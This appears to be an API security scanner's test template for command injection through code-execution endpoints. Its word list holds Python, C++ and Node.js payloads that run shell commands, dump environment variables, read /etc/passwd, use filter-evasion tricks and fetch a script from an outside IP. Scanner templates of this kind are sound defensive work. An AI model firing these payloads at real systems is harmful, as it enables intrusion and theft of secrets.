---
id: COMMAND_INJECTION_CODE_EXECUTION
info:
  name: "Command Injection - Code Execution Payloads"
  description: "Tests whether the application is vulnerable to command injection through code execution payloads (Python, C++, Node.js)."
  details: "This test injects code execution payloads in JSON format to check if the application executes them, indicating a command injection vulnerability in code execution environments."
  impact: "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, potentially leading to complete system compromise, unauthorized data access, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_CODE_EXECUTION
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://twitter.com/trbughunters/status/1283133356922884096"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys
          value:
            extract: bodyValue
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys
          value:
            regex: .*
            extract: queryValue

wordLists:
  # Code execution payloads (Python, Node.js, C++)
  codeExecutionPayloads:
    # Python code execution
    - "{\"language\":\"python\",\"code\":\"__import__('os').system('uname -a')\"}"
    - "{\"language\":\"python\",\"code\":\"import getpass; print(getpass.getuser())\"}"
    - "{\"language\":\"python\",\"code\":\"from pathlib import Path; [print(f) for f in Path('.').rglob('*env*')]\"}"
    - "{\"language\":\"python\",\"code\":\"from pathlib import Path; [print(f) for f in Path('.').iterdir()]\"}"
    - "{\"language\":\"python\",\"code\":\"import os; print(dict(os.environ))\"}"
    - "{\"language\":\"python\",\"code\":\"import sys; print(sys.version); print(sys.executable); print(sys.path)\"}"
    - "{\"language\":\"python\",\"code\":\"__import__('o' + 's').system('env')\"}"
    - "{\"language\":\"python\",\"code\":\"print(open('/proc/self/cmdline').read())\"}"
    - "{\"language\":\"python\",\"code\":\"print(open('/etc/hostname').read())\"}"
    - "{\"language\":\"python\",\"code\":\"open('/tmp/owned.txt', 'w').write('sandbox write test')\"}"
    - "{\"language\":\"python\",\"code\":\"print([hex(ord(c)) for c in open('/etc/passwd').read()[0:20]])\"}"
    - "{\"language\":\"python\",\"code\":\"print(open('/tmp/owned.txt').readline())\"}"
    - "{\"language\":\"python\",\"code\":\"f = open('/tmp/owned.txt'); print(f.readlines())\"}"
    - "{\"language\":\"python\",\"code\":\"print(\\\"\\\".join([open('/tmp/owned.txt').read()[i] for i in range(18)]))\"}"
    - "{\"language\":\"python\",\"code\":\"for c in open('/tmp/owned.txt').read():print(ord(c))\"}"
    - "{\"language\":\"python\",\"code\":\"__import__(chr(111)+chr(115)).system('env')\"}"
    - "{\"language\":\"python\",\"code\":\"globals()['__builtins__']['__import__']('os').system('env')\"}"
    - "{\"language\":\"python\",\"code\":\"globals()['__builtins__']['__import__']('o' + 's').system('env')\"}"
    - "{\"language\":\"python\",\"code\":\"globals()['__builtins__']['eval']('__import__(\\\"os\\\").system(\\\"env\\\")')\"}"
    - "{\"language\":\"python\",\"code\":\"import builtins; builtins.__import__('os').system('env')\"}"
    - "{\"language\":\"python\",\"code\":\"import requests; print(requests.get('http://15.207.107.179:8000/test.sh').text)\"}"
    # C++ code execution
    - "{\"language\":\"c++\",\"code\":\"#include <cstdlib>\\nint main(){char c[]={'i','d',0};system(c);}\"}"
    - "{\"language\":\"c++\",\"code\":\"#include <iostream> \\nextern char **environ; int main(){for(char **e = environ; *e; e++) std::cout << *e << std::endl; return 0;}\"}"
    # Node.js code execution
    - "{\"language\":\"javascript\",\"code\":\"const { exec } = require('child_process');exec('ls -la', (error, stdout, stderr) => { console.log(stdout);});\"}"
    - "{\"language\":\"javascript\",\"code\":\"const fs = require('fs');const data = fs.readFileSync('/etc/passwd', 'utf8');console.log(data);\"}"

execute:
  type: single
  requests:
    - req:
        - modify_body_param:
            ${bodyKeys}: "${codeExecutionPayloads}"
        - modify_query_param:
            ${queryKeys}: "${codeExecutionPayloads}"
        - modify_header:
            Content-Type: "application/json"

validate:
  response_payload:
    length:
      gt: 0
    or:
      - contains_either:
          - "uid="
          - "gid="
          - "Linux"
          - "Unix"
          - "root:"
          - "sandbox write test"
          - "Python"
          - "sys.executable"
          - "environ"
          - "cmdline"
          - "hostname"
          - "owned.txt"
      - contains_all:
          - "uid="
          - "gid="
    not_contains:
      - Error
      - Internal Server
      - <html>
      - </html>
    contains_all:
      - "uid="
      - "gid="
      - "groups="
    not_contains:
      - Error
      - Internal Server
      - <html>
      - </html>
